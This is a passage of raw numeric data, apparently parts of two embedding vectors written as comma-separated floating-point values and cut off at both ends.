006422082,0.036616314,0.014558064,-0.012011229,0.013604563,-0.021464158,-0.0075282976,-0.014136005,-0.012340923,-0.008362834,0.01429943,-0.018944975,0.026813949,-0.022522986,-0.009703248,0.0072800755,0.031147515,-0.0077420683,0.015384339,0.014560079,0.013111758,-0.012802698,0.00873201,0.009387839,0.0021454394,-0.007469907,-0.012375478,0.00014801265,0.0012378651,0.017224584,0.0062024607,-0.022317749,-0.010861332,-0.0065422347,-0.0027460766,-0.012406946,-0.032951836,-0.009342881,0.029581271,-0.005256809,0.010683687,0.004599266,-0.011541555,0.014261183,0.011316583,-0.017490918,0.013409514,0.030485673,-0.011844948,0.01172719,0.0055631017,0.008979551,-0.015122105,-0.026769992,-0.0011397264,-0.027473556,-0.027958803,-0.008258196,0.00074983423,0.013083507,-0.009597528,0.012962059,-0.021638447,-0.055044573,-0.024695832,-0.0041709105,-0.01658466,0.027634736,0.023638569,0.023328582,0.015504021,0.002747982,0.004965961,-0.0047588283,-0.00654895,0.005026664,-0.0012508978,-0.012276392,0.012161171,0.020532897,-0.0061585503,-0.00088120264,0.004404022,-0.0051611545,-0.004562805,-0.013661175,-0.00504362,-0.0054053934,-0.0018484279,0.0012159504,-0.0016589244,-0.0006481092,0.017526912,0.037007064,-0.015616405,-0.013361581,0.014750565,-0.018342244,-0.012319156,0.0034489986,0.0007789854,-0.0043786443,0.0076878625,0.0023695515,-0.024704125,0.02036937,-0.0218492,0.017506987,-0.014187929,0.037250955,-0.02566599,0.007143933,0.0069336197,-0.010506898,0.012214816,0.022119503,0.013558682,-0.004123232,-0.023683343,0.006669866,0.025370669,-0.0026413787,-0.00325456,0.00442093,-0.0017182217,0.006935276,-0.012730211,0.015817987,-0.015489505,-0.021203889,-0.0068521095,-0.00087847095,-0.0044586607,0.011363331,-0.014902927,0.015975779,0.023172792,-0.00023464582,-0.0024976183,0.015347444,0.008825814,-0.0075935363,-0.005709142,0.01823165,0.025608942,-0.0021404482,0.009944568,0.0012149019,0.0018995806,-0.01384044,0.0006297335,0.009459212,0.010079863,0.023587227,0.01875889,0.02198743,0.00811398,-0.0033549408,0.032840483,0.016406294,-0.0034636082,-0.01850252,0.020672422,-0.012172699,0.013014076,0.036890093,-0.011369863,0.0063004186,0.01913267,-0.00006942095,0.008542403,0.0048391256,0.0037197336,0.009919241,-0.0005731115,-0.009913055,0.007648562,0.019293856,0.0012111454,0.03174918,-0.00828109,-0.018839076,-0.004768154,-0.0032050163,-0.0010903121,0.00043648732,-0.012732792,0.016643561,-0.017518986,0.006480498,-0.006824782,-0.01532509,0.02685301,-0.0035607729,0.011155699,0.0124575915,-0.007317931,-0.0074942177,-0.010891386,-0.0073539848,0.012329716,-0.008778831,-0.024475807,-0.004394513,-0.022699129,0.106931835,-0.0110726515,-0.004397135,0.0060653887,0.04018797,0.011981519,-0.011302674,-0.00037079668,-0.014368213,-0.015904875,-0.017832668,-0.026802378,-0.0031089585,0.0011302559,-0.016790064,-0.0037537774,0.020206114,0.01878012,-0.017587654,0.0062867017,-0.020301282,-0.004558835,0.01777561,-0.0063870284,-0.012895793,-0.027996756,-0.009706537,0.015294559,-0.03233193,0.0067297285,0.001222536,-0.005749709,-0.018416062,-0.020727025,0.012100493,-0.005452251,0.008182551,0.0042318795,-0.02477681,0.00947015,0.009526953,0.010035635,-0.00076361175,-0.0071068704,-0.009517582,0.003220956,0.005099821,-0.024892004,-0.019621361,0.014914537,0.0018100546,0.031810243,0.019117333,-0.04395933,0.003622471,0.0064852703,-0.0104625095,-0.012533365,0.014232535,0.0117451595,0.002999052,-0.0043004355,-0.022059388,-0.018435525,0.011405662,0.013107794,-0.008329172,0.0010870585,-0.012088589,0.010264133,-0.020329623,0.03290703,0.013653092,-0.003863912,0.012358391,-0.011703337,0.013687636,-0.01615027,0.010463698,0.005373121,0.0041985423,0.0014295889,-0.01700219,0.0161833,-0.0048820237,0.003298755,-0.01802761,-0.015995435,0.005373749,-0.004046801,0.008987468,0.004408142,-0.008846039,-0.0031678854,0.013139117,-0.01574297,0.0057181427,-0.0074490104,0.009861011,-0.0253468,-0.006062847,-0.020117996,0.003589666,-0.011696679,-0.0051513994,0.013608987,-0.04485339,0.014038408,-0.017720047,-0.0022474916,-0.010773119,-0.0064235325,0.007981049,0.08823624,0.0017758512,-0.05806858,0.021791723,0.013632454,-0.0030833504,0.009789564,0.0031195676,0.013960246,0.008510185,-0.011625225,-0.0041298177,-0.001777724,0.00051399734,-0.013780415,0.010982329,-0.008705435,-0.0007800026,0.02650436,-0.017103456,0.011378597,-0.0022642808,0.008396048,-0.0104234945,0.013530019,0.0041795736,0.01599608,-0.02085304,0.008300365,-0.027210727,-0.0049042515,-0.000815303,0.028710343,-0.0056570005,-0.017672744,-0.01847066,0.022888046,-0.0054083606,-0.005542419,0.009228129,0.008834268,0.026055686,-0.017274426,-0.008289565,-0.0021838415,0.023217764,-0.0006431571,-0.009421653,-0.004593433,-0.032377075,0.012267171,0.012817889,-0.016186131,0.014030363,0.016338943,0.011901587,-0.01917435,-0.017517589,-0.0052477717,0.013122989,-0.016400717,-0.020418858,-0.007574742,0.003343006,-0.009191029,-0.012498994,-0.00049277884,-0.005317105,-0.00983805,0.015604967,0.012132909,0.0073888125,0.0136030195,-0.016241884,-0.0006957682,-0.020872036,0.018539965,0.008426664,0.02638351,0.0014420323,0.024880627,-0.00969509,0.00041662512,0.012216443,0.002896318,-0.033549663,-0.0017643638,-0.022270203,0.011742399,-0.011556391,0.024334705,0.013670084,-0.01594006,-0.011263933,-0.008615341,-0.004918191,0.006043363,-0.07859177,0.009933144,0.012368965,-0.008857861,-0.026855651,-0.0015874357,0.0024686744,0.0047455104,0.02579034,-0.008095394,0.002950907,0.011276627,0.03219624,-0.010043279,0.0020158177,0.0056258678,-0.026388528,0.009147555,-0.020085555,0.0028118347,0.007930993,-0.0011277787,-0.018131474,-0.0046000658,0.015717432,0.007353095,-0.003693411,0.020155339,0.016588338,-0.018893145,-0.00074140145,0.0010298261,0.010687802,0.020817997,0.009174655,-0.032669205,0.019991541,0.00047910234,0.005476355,0.01147005,0.013131701,-0.020374574,0.014108137,0.019579465,0.008192285,0.021110035,0.0032552248,0.008665982,0.020939259,0.003362617,0.016590837,0.009782041,-0.011189921,0.009829436,-0.012634455,-0.0141509455,-0.019373098,-0.0049317167,-0.013592913,0.0056613623,-0.011736989,0.014760951,-0.022342112,-0.006203304,-0.013531352,-0.001963516,-0.0056607253,-0.0067558563,-0.006929358,0.0074576167,-0.011980182,0.03206259,0.024956442,0.0075014355,0.028929379,0.010561535,-0.014728364,0.03282734,0.019505372,-0.0036034451,-0.0056567155,-0.0015978841,-0.019744473,0.021208653,-0.018586017,0.0009499812,-0.0044643604,0.01256358,-0.011163149,0.02590363,0.014966196,0.056273025,-0.01299133,-0.0029230602,0.008823449,0.00036178337,0.0047817123,0.0051686405,-0.0015992696,-0.017437933,-0.030363983,-0.00917667,0.012525618,0.011966879,0.009319849,0.008297223,-0.0064165913,0.012675613,-0.00085508527,0.0047651213,0.013948924,0.02986124,-0.027404817,0.019558482,0.0103276875,-0.007677992,-0.0029784304,-0.003818489,0.00934255,0.012026188,0.0034904184,0.030193586,0.015098068,0.0012714537,-0.027512573,0.016735561,-0.025090683,0.024164254,0.016884506,0.011254785,-0.014271377,-0.0045190747,-0.0052114013,-0.0134710455,0.003549978,0.0055241664,0.029183913,0.0011827387,0.012784069,-0.0008302006,0.022176769,-0.010730005,0.027411299,0.015701579,-0.0026320412,-0.0088321725,-0.010742758,-0.015144141,-0.005745577,0.00773571,-0.008421667,-0.006523894,0.018792104,-0.02680187,0.0062816474,0.010004933,-0.025156995,0.013582437,0.009727521,-0.008062575,-0.0057703354,-0.0016394563,0.024646899,0.011307514,0.023104193,-0.012012632,0.018605165,-0.007505209,0.0046333624,0.018151848,0.0028597969,-0.005728389,0.015141392,-0.024316117,0.0016059098,0.023207258,0.022752581,0.03555224,0.006959497,0.011899814,0.016602596,0.0061043603,-0.002367373,-0.009702929,0.030670926,-0.004160868,0.010794559,-0.0076941187,-0.009806301,-0.010596373,-0.009500883,0.0031355203,-0.02378412,-0.005731307,0.0043583643,0.0044596405,-0.0037033104,-0.000024047504,0.016020678,-0.025651146,-0.017056866,0.019882236,0.018653648,-0.0016343485,-0.017127719,0.005129827,0.0013779056,0.018312179,0.0036971571,0.003748133,-0.005953209,-0.008708581,-0.0050972337,0.015733702,0.016805649,0.011663007,0.0048813913,-0.010478776,-0.01168267,-0.015982479,-0.0061233724,-0.013159094,0.030224692,-0.01959157,0.018361492,0.024714917,0.013865492,-0.007425004,-0.0035154002,-0.0010445981,0.01426681,-0.0028682617,-0.006209068,0.032912534,-0.004959533,0.006505197,0.008490721,0.0060720006,-0.0138193695,-0.0140916845,0.008714275,0.008467338,0.020020138,-0.006611001,-0.0026181352,-0.0014053879,0.020376725,0.0063287467,-0.019659918,0.009998463,0.001123358,0.0052228235,-0.020065453,-0.023492064,-0.007871506,-0.017671427,0.0077358223,-0.008066051,0.011558892,0.009505264,-0.030036852,0.014248457,0.007540831,-0.00213444,-0.000031650805,-0.007825142,0.011164128,-0.035357933,-0.0037944228,0.0040887515,-0.0064679575,0.0036137046,-0.0047828304,0.009835437,-0.00020062328,-0.0059998985,-0.009100364,-0.015771067,-0.010540139,-0.0050135353,-0.03322429,-0.0068512955,-0.006100026,-0.002895911,-0.012751122,0.01040987,0.0050327242,0.017481223,0.005467664,-0.010810198,-0.0026516179,0.0045545,-0.008847567,-0.020463655,-0.02187307,0.007749913,0.030072,-0.0033467615,0.0034267649,0.009766106,0.024479955,-0.012600203,-0.03066296,0.016353693,-0.012846828,-0.014435888,-0.012140474,-0.007351354,0.008539723,0.008896784,0.005654149,-0.013277009,-0.005068359,0.022544159,-0.011352766,-0.0095614735,-0.003650432,-0.00229267,0.006687188,-0.005035258,-0.005856991,-0.023851141,0.00906073,-0.010149473,0.035744898,0.0031482335,0.032217015,0.015828194,-0.019195225,0.00075895473,0.02078781,0.029809836,-0.0148677025,-0.016032515,0.008958488,-0.015090457,0.01183132,0.025130296,-0.0053172125,0.018078083,-0.00030705665,0.009768232,-0.001003556,-0.01769651,0.0018952881,-0.0037482334,0.0014756115,-0.007847915,0.00046485392,-0.0014441373,0.0022462332,0.0026279218,0.01463686,-0.0031345752,0.00773298,0.0033333295,-0.033993185,-0.0009083333,0.013979753,0.00030304946,-0.02313425,-0.005968783,0.0014081083,-0.020888535,-0.012729507,0.012819259,0.002505212,0.0038562817,-0.020045886,0.011873026,-0.0032208732,-0.009715704,-0.0027035633,-0.013295038,-0.013547232,-0.07672195,0.010226172,0.007106553,-0.01575163,0.0040948144,0.008516484,-0.048346166,0.0031166428,-0.0056059137,0.016774688,-0.013122832,-0.021484,-0.023342688,0.038658377,0.011028704,-0.02251576,-0.014890611,0.005736309,0.014286269,0.0067000045,0.012273956,0.026868366,0.0072232625,0.009034676,-0.010488227,-0.006725066,-0.007862832,0.0041429894,0.007111898,0.0013758109,-0.020175843,0.0015605004,-0.02515585,0.012035179,-0.0011481163,0.020664932,-0.012212985,0.0214643,0.022752346,-0.02378087,-0.0036061942,0.0055456734,0.024694016,-0.014362225,0.017424146,0.027910907,0.001890217,-0.02791193,-0.029823551,0.00042221803,0.036882047,0.0047744834,-0.013049634,0.0042486014,0.016393969,0.033910215,-0.014574862,0.00030833264,0.032280162,0.00076730445,-0.022393987,-0.023560308,0.03435076,0.009769868,0.011656086,0.018010365,0.000025152722,0.007127418,-0.0120837,0.0062993583,0.013953528,-0.022744562,-0.039143175,0.0072965105,-0.0044610603,0.030308677,-0.0070849075,-0.016451903,0.008033457,0.011700685,0.018132683,-0.0029710555,0.009003716,-0.011317455,-0.021866519,0.008595448,-0.00660651,0.008072501,0.033658553,0.010492297,0.00494719,-0.020822536,0.0009547815,-0.0029281587,-0.014408179,0.0016131308,-0.007700958,-0.01584003,-0.005442205,0.013552431,-0.020503994,-0.011157718,0.0058475686,0.0178222,-0.0038642723,-0.007970138,0.0053020846,0.018217735,0.008184099,-0.0041693216,-0.007876928,0.018398726,0.008457732,0.011668586,0.030971825,0.014782875,-0.009021217,0.014816478,-0.0014881061,-0.0066887415,-0.01614461,-0.02959164,-0.01574751,0.000020118889,0.014417483,-0.016020555,0.016061077,-0.016221296,-0.01843218,0.018426904,-0.012951299,-0.0073120384,0.027512548,0.016504573,0.01508613,0.0105016995,0.025330625,-0.007842069,-0.017062528,0.0059497235,0.00060811715,-0.04857789,-0.013621343,0.0061598793,-0.017636273,0.04620172,-0.0071826447,-0.0037132117,0.011037842,-0.0076779667,0.0031049054,0.01178141,0.01195671,-0.010705197,0.019790463,0.019381063,0.009100433,-0.006509736,0.016136106,0.0040545654,-0.0017855867,0.0035654411,-0.021011084,0.009454723,-0.030009946,0.011574784,0.006092615,0.0052300757,-0.010941139,-0.029946571,-0.014787346,0.0006277552,0.0048404746,-0.0017474991,-0.019688714,0.010805758,0.017102709,0.011243441,-0.014458899,-0.0029376259,-0.011345656,-0.0071341908,-0.0018288575,0.010540045,-0.005089865,-0.015237141,-0.019812658,0.002607987,-0.0148481075,-0.011928401,-0.017585212,-0.0066186325,-0.0041011614,0.041976843,0.011103587,-0.017363615,0.011998775,0.0042055086,0.0072090067,0.024347251,-0.019384908,0.0018389638,0.021573381,0.004183747,0.0197183,0.018702073,-0.0027751166,-0.005579787,0.016389297,0.02099404,-0.005953783,0.025564194,-0.012776629,0.08902586,0.0016989056,0.0008870593,-0.011188216,0.0027812081,-0.001866138,0.0494902,0.010938248,0.014429678,0.024500236,0.0038966932,0.0009507806,-0.013128462,-0.006090772,-0.008647819,0.03520525,0.01666585,0.010699126,0.021272559,-0.016117636,0.03248582,-0.038512595,0.00090300926,-0.015324028,0.007113683,-0.028706683,-0.016299991,0.021818046,-0.0011524584,0.016469523,0.005418911,-0.00437128,0.015343739,-0.004010629,-0.011274057,-0.0037114914,0.015751878,-0.02182113,-0.0069813174,0.0022137687,0.011318935,0.015363375,0.00070654217,-0.0134158265,-0.025644332,0.018499017,-0.009169694,-0.013932231,0.0035849358,-0.006792085,0.0040074643,0.013626059,0.0035884434,0.007123038,0.0033196944,-0.0058497414,-0.019157907,-0.0033910456,-0.015921898,-0.021022042,0.028708803,-0.01404491,-0.009506581,0.0053815963,0.016126057,0.015259382,-0.025877828,0.017484896,-0.03059006,-0.045102198,0.021075463,-0.010942632,0.010825216,-0.002258404,-0.012949888,0.005400325,-0.022318317,-0.0029112604,-0.0113303475,-0.006180714,0.0073818513,0.007891113,-0.013606927,-0.028282816,0.01645972,0.012667886,0.0041630953,-0.0032846862,0.0067312354,0.0077887475,0.008796694,0.021182077,-0.004617213,0.011617034,-0.025186049,-0.0052147033,0.019882884,-0.027465599,0.010206344,-0.008147138,0.011644147,-0.018295927,0.0020836033,-0.007270456,-0.0131438915,-0.0001005336,0.008416622,0.02931512,-0.021315385,0.0092538465,0.0171318,-0.0011977045,0.00050356466,-0.00069053087,-0.0048506483,-0.012022925,-0.003683701,-0.024063785,0.0029550563,-0.01604293,-0.006273914,0.003958176,0.012466573,0.015123886,-0.016910527,0.0068964055,-0.0037231522,0.004463619,-0.017787825,-0.011947785,0.012652626,-0.034351647,-0.016881831,0.0086829625,0.0070269015,0.016654506,0.009936436,0.005855119,-0.01277575,0.007758507,0.01885456,-0.0068157394,-0.020298474,-0.012005577,0.00645264,-0.018299906,0.029496275,0.00006266747,0.0267907,0.011273119,-0.0007035444,0.004471527,-0.0124052735,0.0100064725,-0.0066906502,-0.016015105,0.023520216,-0.013403854,-0.005048898,-0.008921026,-0.013058653,-0.0047840714,0.020044679,-0.032737233,0.0064785876,-0.011866402,-0.0024268834,-0.004187738,-0.010391688,0.03211065,0.0016467003,-0.004606463,-0.0012344144,0.0328178,-0.011350339,-0.025765313,-0.006483553,0.011874393,-0.0042220256,0.00033541047,0.012925563,0.013333072,0.0032066943,0.0115048485,-0.019200604,-0.003179982,0.00031632988,0.0113526955,0.004024512,0.026179776,-0.0060691717,0.026158767,0.013621453,-0.00077664974,0.02460366,0.0060983794,-0.027329907,0.039707556,-0.028587244,-0.023382096,-0.010424736,-0.01680814,-0.021511685,-0.024841113,0.00056970207,-0.01057108,-0.00025550113,0.002230876,-0.025550647,0.001440387,-0.001638474,-0.011417748,0.0023162193,-0.011322323,-0.005506524,-0.0034595467,-0.014785419,-0.025029138,-0.028634582,0.007628413,0.017235082,-0.013479926,-0.026659364,0.009153814,-0.0046941624,-0.00853479,0.011067137,0.02981463,0.007781711,-0.010098715,-0.017749844,0.0072285202,-0.01949725,-0.038992435,-0.013555907,-0.0060069286,0.007639097,0.0149339475,0.0037914484,-0.01261964,-0.008978809,-0.0048650657,-0.016484413,0.0024138435,0.011380652,0.004420686,0.007645404,0.0018642598,-0.012433345,-0.038610063,-0.012452689,0.0070361467,-0.024122825,-0.0057649245,-0.016645884,-0.004982359,-0.011115299,0.01286411,0.012909282,-0.009649716,0.0062437067,-0.0053538005,0.009351914,0.008232182,0.0059556384,-0.023802863,0.022168495,0.00094396935,-0.018820705,-0.012545077,0.0003748872,-0.0011021352,-0.014471426,-0.012912091,-0.019552298,-0.0009587193,-0.013186931,0.0107324645,-0.028080763,0.017865527,0.0053704097,-0.001679622,0.016129194,-0.004640079,0.02074023,-0.0029829952,0.028903356,0.017961629,0.053889714,-0.047222227,-0.0001747756,0.0375165,-0.01833393,0.0052190693,0.0024952136,-0.01984425,-0.083932735,-0.007559185,0.03003554,-0.017658398,-0.0065571954,-0.046573322,0.03254962,-0.0030826048,-0.022115413,0.012704137,-0.002956185,0.005590269,-0.014190008,0.013951117,-0.004566254,-0.005689136,0.019765014,-0.009965164,-0.008685256,-0.013873517,0.010298408,0.0012052766,0.012282013,-0.0065593477,-0.008266564,-0.017958932,0.010974325,-0.0058771325,0.010510255,-0.00034597403,0.017079564,-0.025315277,-0.003697474,-0.024397401,0.012241568,0.011362203,0.021691587,-0.0053120735,-0.013037653,0.0073907245,0.0044172215,0.15802413,0.0056538912,-0.004145305,-0.014798373,0.0035335638,-0.02088951,-0.0067883655,0.019854404,0.017882623,-0.0005035806,0.0049249376,0.011805582,0.011713198,-0.020369953,0.020721484,-0.021117419,-0.011394184,0.17429268,0.00665339,0.012372158,0.022320738,-0.0012429708,0.014582704,0.017340822,0.0057079466,-0.041139588,0.0036316891,-0.043483473,-0.00062587037,-0.0057011195,0.0072768996,0.026057517,-0.0064143543,0.008485237,0.005409952,0.022485005,-0.017615525,-0.0033235897,-0.04553147,0.0040996065,-0.0013124455,-0.019601274,-0.0065597272,0.0013119864,0.007664516,0.015045546,0.004484145,0.0068890094,0.02092321,0.021754976,0.020243242,0.0070237485,0.022296863,-0.01982672,0.0007984629,0.011238024,-0.002722374,0.01808283,-0.006373762,0.02776197,0.0022917553,0.012382185,-0.003683478,0.01633333,-0.011010016,-0.0043980465,-0.0014266516,-0.030976994,0.009673819,0.004049156,-0.00042534783,-0.006136457,-0.018437264,-0.012544407,0.0068947775,-0.0034853101,-0.0101202475,-0.0139505165,0.010358867,-0.009152245,0.034863066,0.01569191,-0.018650007,-0.015534477,0.011297204,0.04148064,-0.024200061,0.008013131,-0.0031830987,0.012470342,-0.018240118,-0.0017399661,0.012840708,-0.0002467533,-0.01369762,0.017356483,-0.017667804,0.017036853,-0.01872054,-0.0013360509,-0.008846337,-0.005364984,-0.0122278575,0.009736413,-0.012634116,-0.0121355355,0.011132318,0.0053232317,-0.0067485636,0.009095697,0.002871755,0.006794899,-0.00670266,-0.003829827,-0.010599161,-0.0032295045,0.012805547,0.012606051,-0.026407555,0.0036932202,0.0038862573,-0.0061015524,0.01820186,0.01451709,-0.036326345,-0.010189438,-0.007913941,-0.02046369,-0.01885088,-0.013141041,-0.004704368,-0.011094446,0.012251578,0.030973205,0.019861493,0.0010372729,-0.0035181397,-0.03467202,0.002533822,0.016915018,-0.0016805454,0.020705463,-0.006336141,0.015265429,0.014057401,0.003301116,0.006114772,0.006427781],[0.0017812405,-0.0033197138,0.0034257227,-0.012110391,-0.009729373,0.002089545,-0.010316957,0.03576485,0.007648255,-0.0029191794,0.016116278,0.003992336,-0.009707873,0.026067866,0.013757271,-0.0036504513,-0.028265888,0.0063911164,0.011515614,-0.0011726188,-0.010534737,0.010179784,0.0074058366,0.01568881,-0.0133601455,0.010484742,0.024911268,-0.028055489,0.03839059,0.0020995315,-0.004334607,0.01650263,-0.010099053,0.008944299,-0.0022192511,-0.0011284276,-0.0044271485,0.0077758236,0.004016717,0.0008548859,0.015742712,0.011163731,-0.0009941981,-0.012423407,-0.0011865896,-0.0013493832,-0.008877564,-0.016063087,0.030395634,0.024814377,-0.005314226,0.0099547645,-0.0038101492,0.0013188303,-0.0045700865,-0.012038391,-0.00199829,-0.0258763,0.039622776,-0.011565136,-0.0061137015,0.06316621,-0.0004057208,-0.015070126,0.0012325431,-0.034753382,0.005067052,-0.003688831,0.0035891086,-0.01862112,0.031790618,0.013195593,-0.0062931934,-0.0075320904,-0.029186184,0.015728857,0.007429342,0.007485756,-0.029906586,0.0034646634,0.004124502,-0.0071480894,0.0107863685,0.010468052,-0.008030022,-0.0010550432,-0.0026225746,0.009914649,0.02839937,-0.033429302,0.014063536,0.017690562,-0.016752569,0.0103111975,-0.010374387,-0.011415778,-0.016080717,-0.02025095,0.02757936,0.02028172,0.027357627,-0.016466884,-0.017208416,0.0078494325,-0.0073306966,0.024576468,0.018349271,0.017978556,-0.0005887954,-0.0032900206,0.00016238797,0.007175631,0.02705229,-0.0016663243,-0.0071251765,-0.0065086186,-0.008354039,-0.0013048741,0.012730638,0.024576282,0.007126301,-0.026733475,0.0014940044,-0.015330222,-0.021327252,-0.010082569,0.012899516,-0.009278642,-0.017597953,0.0007226323,-0.006281411,0.018584387,0.003408746,0.00603497,-0.03234143,-0.029839212,0.0036266125,0.00921262,0.021121547,-0.02161993,0.032287605,-0.029538883,0.02087409,0.00025258007,-0.013326769,-0.017321246,0.0054147528,-0.022863824,0.01784604,0.006087341,0.028647624,-0.0007763299,-0.00040382132,-0.0044145733,0.017065614,-0.011376999,-0.016643638,0.016500521,0.008739703,0.03947327,-0.014153684,-0.011799894,-0.008609551,0.013866126,-0.013355541,-0.019582836,0.014832037,-0.012982748,0.025944563,-0.020577626,0.008014192,0.020934146,-0.00472994,-0.013889101,-0.0098105185,-0.037476264,0.027477007,-0.0039374456,-0.00081060134,0.00006645468,0.0077636507,0.025064513,0.00011059871,-0.009975908,-0.03460762,0.013448288,0.022992574,0.009575751,-0.013472855,0.024885902,-0.0065070437,-0.009695502,0.012208766,0.00086282525,0.007176312,0.00322709,0.020275177,0.06684612,-0.012259479,-0.0005677266,0.0023163203,0.0029790981,-0.00076728006,0.0023975086,0.00016199873,0.0023304964,-0.025635226,-0.009781406,0.004397906,0.0086641265,0.018092908,-0.013911944,-0.015654812,0.012169187,-0.0040401146,-0.0749689,-0.0043310183,-0.021212982,0.001515483,0.02801776,-0.01699877,-0.006167257,-0.007764479,-0.017294226,-0.0006663653,0.001598549,0.013542439,-0.007966333,0.004332124,-0.019365229,0.026185049,0.011934609,-0.025813872,0.029872866,0.027762732,0.0030870093,-0.013064579,0.009586505,-0.017644571,0.004837603,0.011274506,0.0022342044,-0.015536614,0.008958823,0.006670679,-0.008875036,0.009315064,0.008910431,0.016130924,-0.0045155436,-0.009822617,0.0027689403,-0.0060883095,0.02730165,0.020665677,0.0035275158,-0.0027076316,-0.0071793743,0.013166487,0.004569421,0.0058754073,0.042760853,-0.019340666,0.00570412,0.046438087,0.010725929,-0.000446864,-0.035077322,0.0046331417,0.011578806,-0.014468795,0.0009388558,0.004814467,0.012548262,0.038650215,-0.029269671,0.019655501,-0.0029901648,0.023914404,-0.0075481813,-0.0041061905,-0.04569192,0.018231759,-0.013927695,-0.010461811,0.0065301964,0.020010542,-0.0057562646,0.0059171957,-0.011198224,-0.017750124,0.0010033236,0.046430655,0.015975978,-0.006750539,-0.027879642,-0.015482573,0.034822114,0.003090966,0.0044758706,0.0141777545,0.007323761,0.018018804,0.0013949639,0.027890196,0.026751082,0.0038548594,-0.016910467,0.00521027,0.004182499,0.008522384,-0.007508403,-0.0026383586,-0.01703555,-0.019556718,0.02128069,0.024290185,-0.005329429,0.023095993,-0.0017263378,-0.0036424687,0.008146449,-0.0028543223,0.0024339,-0.0039547654,0.0070724413,0.025863742,0.0004921415,-0.014464661,-0.015182181,0.018132737,-0.017173182,0.0063059423,0.02646913,-0.02707805,0.011228084,-0.0037853948,0.016167969,0.0016881587,0.0068543768,-0.014526493,0.002486317,-0.008680271,0.0056610894,0.014067956,-0.016247325,-0.009967295,-0.018157816,0.006133563,0.009098436,0.0063095363,-0.0073876656,0.0078006154,0.005625669,-0.04280055,0.0055361046,-0.015132653,-0.025628902,-0.0073201265,0.0031275924,-0.00089802843,-0.02447232,0.010306615,0.01938309,0.05749969,0.017352572,0.0078069987,0.02403503,0.0062859203,-0.00035778392,0.011448486,0.020967206,0.023978101,-0.007495541,0.00056267134,-0.0013488701,-0.012393749,0.09311379,0.02227647,0.011315113,-0.006773719,0.013842879,-0.010369423,-0.021003673,0.024083605,-0.007917021,-0.026474498,0.02770881,0.005926529,0.020327851,-0.009704737,-0.0066590975,0.005392638,0.0020717178,0.009962104,-0.0035976705,-0.021137934,-0.008894157,0.005502528,0.028487401,0.011702849,-0.0052833166,0.014540121,-0.0010340416,-0.0023402579,-0.013602636,-0.014082201,0.011550662,0.015610161,0.019350927,0.0013578839,-0.0176765,0.006777738,0.006471706,-0.023041915,-0.0043314393,-0.0133015895,-0.000045397468,0.008064264,-0.00997368,0.009308604,-0.015516624,0.0020972446,0.014170903,0.017879486,0.026639564,-0.012919713,0.03989978,0.01431705,0.014539371,0.011682998,0.027555402,0.0018332389,0.004236835,-0.009836488,0.03344349,0.029268006,-0.005151462,-0.032147262,-0.0016432172,0.020872075,-0.016255736,0.00071270694,0.05443129,-0.00798016,0.0033713835,0.006105665,0.028686982,0.012257341,-0.013475802,0.0017640442,0.02458074,0.013485186,-0.020596687,0.011355615,-0.00615776,0.014271842,-0.031818874,0.013556993,-0.06993508,-0.0074676764,-0.021227723,0.011435798,-0.023076018,-0.0056392835,-0.04545261,-0.017041672,0.020105392,-0.010790443,-0.02371923,-0.0009051434,-0.014837838,0.0065382193,0.0043457537,-0.0059375344,-0.006756532,-0.01028014,-0.014543054,-0.018620564,-0.0041849734,0.020126289,0.0037380152,-0.0055882027,0.0017257576,0.003799393,0.019584801,-0.007541336,-0.017874327,-0.04333547,0.022756673,-0.0036729004,-0.010594406,-0.015445398,-0.021774143,0.009508784,0.007594167,-0.0182411,0.0049824365,0.011181123,0.018836211,0.0058886013,-0.026245875,0.001003589,0.026830597,-0.0019443238,0.005065876,-0.0037198055,0.007062797,-0.0018719673,-0.00021239033,0.00069019134,-0.016154656,0.012399504,0.0047013047,0.01034653,-0.008584778,-0.0047137067,-0.011898517,0.0018519846,-0.010375246,0.013731169,0.00034869945,-0.016508639,0.0061366223,0.02138248,0.003670711,0.018798653,0.016821899,0.014627025,-0.005236125,0.0031245658,0.03725029,-0.004134515,-0.02157798,0.018075794,0.01958445,0.018593455,0.009328318,0.0068913046,0.013519299,-0.00617742,0.0062695765,0.0010806593,0.019066991,0.029635241,0.00035792537,0.012153855,-0.004079851,-0.018500578,0.004560894,0.009736155,0.009513845,0.001074347,0.011245233,-0.015600399,-0.011952504,-0.016098095,0.00507144,0.0026959393,0.0069113206,-0.00014526164,0.02984845,-0.025591096,0.017566863,-0.00008088859,-0.0069608623,0.011390739,0.0013529254,-0.009454574,0.005989106,0.026951334,0.005453646,-0.0012156176,0.032418247,-0.024440058,-0.012101862,-0.0067023723,-0.022430558,-0.0168752,0.0059200884,-0.0103038745,-0.024767613,-0.01258441,0.008192834,0.008416604,0.0106867775,-0.013169531,0.009522746,-0.0022994466,0.005839655,0.020185392,-0.036861904,0.011243158,-0.026819242,-0.006602718,-0.012124143,-0.0056016212,-0.004576984,0.000037808863,-0.0066832127,-0.052012336,0.021453792,0.013614323,0.020357287,0.01639783,0.003524093,0.0054119043,0.015011826,0.009747266,0.02405991,-0.016101621,0.021369973,0.026186394,0.0046015168,-0.011523835,0.004145027,-0.012901097,0.012136002,-0.0058159837,0.009615409,-0.012545757,-0.011981881,-0.009926312,-0.037620276,0.01154831,-0.01071552,-0.009662933,0.0028959564,-0.010572991,-0.002361923,-0.010222506,0.025632437,-0.009119301,0.012826649,0.0038879763,-0.023828667,0.0031063824,0.021751402,0.0064910315,0.014118104,-0.023635881,-0.011103003,-0.033599105,0.014867,0.012648927,0.016951185,-0.010360449,0.013586464,0.0012073914,0.049888305,-0.015148214,0.0059280023,0.008415668,0.005128167,0.0093919,-0.014504901,0.020916749,-0.015002029,-0.0108548915,-0.030425493,-0.015971342,-0.03223797,-0.040306557,0.03197353,0.003796053,0.0030208917,-0.009090488,0.007837136,-0.0070279418,0.015354246,0.0029888963,-0.016481837,-0.017065857,-0.014512034,0.01505783,-0.0026760376,-0.004493997,-0.061341595,-0.003266908,-0.00043033727,-0.01138064,-0.017231273,0.004481149,-0.0028191688,0.00096051017,-0.018358275,-0.0043949843,0.024427317,-0.010752444,-0.0030739063,-0.025577411,0.020586235,0.016728027,-0.0030549318,0.030502763,0.012594387,-0.004005545,0.011142357,-0.0067820256,0.028129185,-0.0127616925,-0.009891251,-0.0027919943,0.00038872263,0.03689077,0.012761905,0.0021501756,0.0017869421,0.0038653782,0.00561231,-0.0020189076,-0.0041049155,-0.005903186,-0.0064157103,0.023682872,0.0129540535,-0.013259328,0.020042656,-0.01106879,-0.007656674,0.0013367414,-0.016208116,0.017866,-0.0026798078,-0.03708226,-0.010443142,-0.0028053287,-0.0024514026,-0.006897768,0